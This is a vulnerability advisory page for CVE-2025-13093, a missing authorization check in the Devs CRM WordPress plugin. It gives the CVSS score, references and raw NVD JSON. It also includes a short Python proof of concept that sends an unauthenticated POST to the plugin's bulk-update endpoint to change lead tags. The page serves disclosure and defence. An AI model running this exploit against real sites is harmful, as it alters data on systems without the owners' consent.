CVE-2025-13093

Description

The Devs CRM – Manage tasks, attendance and teams all together plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '/wp-json/devs-crm/v1/bulk-update' REST-API endpoint in all versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to update leads tags.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Devs CRM plugin <= 1.1.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

target = 'http://vulnerable-wordpress-site.com'

# CVE-2025-13093 PoC - Unauthorized bulk-update via REST API
endpoint = '/wp-json/devs-crm/v1/bulk-update'
url = target + endpoint

payload = {
    'lead_ids': [1, 2, 3, 4, 5],
    'tags': ['malicious_tag', 'spam', 'unwanted']
}

headers = {
    'Content-Type': 'application/json',
    'User-Agent': 'Mozilla/5.0 (compatible; CVE-2025-13093-PoC)'
}

try:
    response = requests.post(url, json=payload, headers=headers, timeout=10)
    print(f'Status Code: {response.status_code}')
    print(f'Response: {response.text}')
    
    if response.status_code == 200:
        print('[+] SUCCESS: Lead tags updated without authentication')
    else:
        print('[-] Failed or plugin not vulnerable')
except requests.exceptions.RequestException as e:
    print(f'[-] Request failed: {e}')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13093
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13093
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13093/
[4] VulDB https://vuldb.com/cve/CVE-2025-13093
[5] https://wordpress.org/plugins/devs-crm/
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/78794ea4-6eff-4e6f-af0a-dd8cab8ac859?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13093", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:47.143", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Devs CRM – Manage tasks, attendance and teams all together plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the '/wp-json/devs-crm/v1/bulk-update' REST-API endpoint in all versions up to, and including, 1.1.8. This makes it possible for unauthenticated attackers to update leads tags."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/devs-crm/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/78794ea4-6eff-4e6f-af0a-dd8cab8ac859?source=cve", "source": "[email protected]"}]}}